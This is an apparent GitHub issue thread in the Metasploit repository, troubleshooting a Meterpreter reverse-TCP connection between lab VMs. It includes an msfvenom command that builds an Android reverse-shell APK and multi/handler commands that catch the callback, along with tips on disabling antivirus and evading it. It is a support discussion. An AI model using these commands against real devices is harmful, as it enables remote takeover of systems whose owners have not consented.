### ISSUE TITLE
Rev tcp doesn't work

### ISSUE THREAD

**Issue by Omer19966** [rapid7/metasploit-framework#11712]
## Steps to reproduce
I'm pretty new to this, I'm trying to run a reverse connections using the "go/meterpreter/rev_tcp"
I set the right lhost and lport on Veil and also in msfconsole and when I try to run the payload its just stuck on that  
> [*] Started reverse TCP handler on 10.0.2.15:8080 

How'd you do it?

1. Run veil first and then I used 16 on the list which is
>  go/meterpreter/rev_tcp
then I went to msfconsole and set the payload to 
> windows/meterpreter/reverse_tcp
and then its just stuck and won't start.

**Comment by wvu-r7** [comment]
If it's stuck on that with no stage sent, check that the payload can egress to your handler. Firewalls and NAT can block you. Maybe even AV or HIPS.

**Comment by wvu-r7** [comment]
We also don't support Veil, so it could be something going on there.

**Comment by Omer19966** [comment]
You mean that my host windows has those software maybe ? 
How can I check further ?
I don't think it's Veil cause it runs with no errors

**Comment by wvu-r7** [comment]
Please supply more information about your environment. I have no idea what you're running Metasploit on or which Windows you're targeting.

Wherever you're running Metasploit, you need to be able to connect to any handler ports that are listening. Usually this is a firewall or NAT problem. Add an exception or port forward if that's the case.

If the payload is being blocked on the target by AV or HIPS, you'll want to do better at evasion or disable any software preventing payload execution or egress.

**Comment by Omer19966** [comment]
I have a Kali Linux 2019.1 using Vbox 
and I'm targeting a windows that is running on that vm, but I haven't got to the part where I make the connection it's just getting stuck in the exploit point.
I need to add an exception in my own host or on the vm windows? 
and any idea what program or something is the cause of it

**Comment by wvu-r7** [comment]
I think you need to spend a little time understanding the networking of your environment first. The answer likely won't be security-specific.

Host-only or NAT adapter in VBox? Can you pick the Kali box via Windows? More info needed. Also, what exploit? Are you using `exploit/multi/handler`?

**Comment by ragediver** [comment]
i'm gettting a similar error when trying to do the same thing on metasploit between Kali Linux 2019 and a virtual Android device on Genymotion. I get the following: 

These are the commands i used to generate the payload: 

msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_ip> LPORT=4444 R > hack.apk

root@kali:~/# msfconsole
use exploit/multi/handler set payload android/meterpreter/reverse_tcp 

set lhost X.X.X.X set lport 4444 exploit  

msf5 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 192.168.7.203:4444 
[*] Sending stage (179779 bytes) to 192.168.7.202
[*] Meterpreter session 7 opened (192.168.7.203:4444 -> 192.168.7.202:34564) at 2019-04-11 18:03:18 -0400

**Comment by wvu-r7** [comment]
What's the error? Looks like a success to me.

**Comment by timwr** [comment]
@ragediver try 
```
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <attacker_system_ip>
set lport 4444
exploit
```

**Comment by Omer19966** [comment]
> I think you need to spend a little time understanding the networking of your environment first. The answer likely won't be security-specific.
> 
> Host-only or NAT adapter in VBox? Can you ping the Kali box via Windows? More info needed. Also, what exploit? Are you using `exploit/multi/handler`?

yes I use `exploit/multi/handler` and I use NAT network connectivity both on windows and kali vm 
I tried to ping the windows vm and it worked

**Comment by wvu-r7** [comment]
You tried to ping the Windows VM from where? Your host or the Kali VM? Did you try to connect to a port on the Kali VM from your Windows VM?

**Comment by Omer19966** [comment]
I tried to ping the Win vm from my kali vm.
I didn't do the second thing mostly cause I don't know how

**Comment by wvu-r7** [comment]
I think this question has exceeded the scope of Metasploit. While GitHub has primarily been for bug reports and feature requests, we've relaxed the restriction on support questions - there is even a label for it. This is no longer a Metasploit support question, though.

Try setting your Kali and Windows VMs to host-only networking, making sure your Kali has no firewall, and making sure your Windows AV is disabled. Good luck!

**Comment by ragediver** [comment]
this is a metasploit question because I'm following the procedure and tested in on multiple devices and reverse tcp is not working.

**Comment by wvu-r7** [comment]
@ragediver: Then perhaps you're encountering a bug in Android Meterpreter. "Reverse TCP" is a payload *type*. This was a question about Windows Meterpreter at first, but it turned out to be a networking question instead. Please open a separate issue if you have a bug.
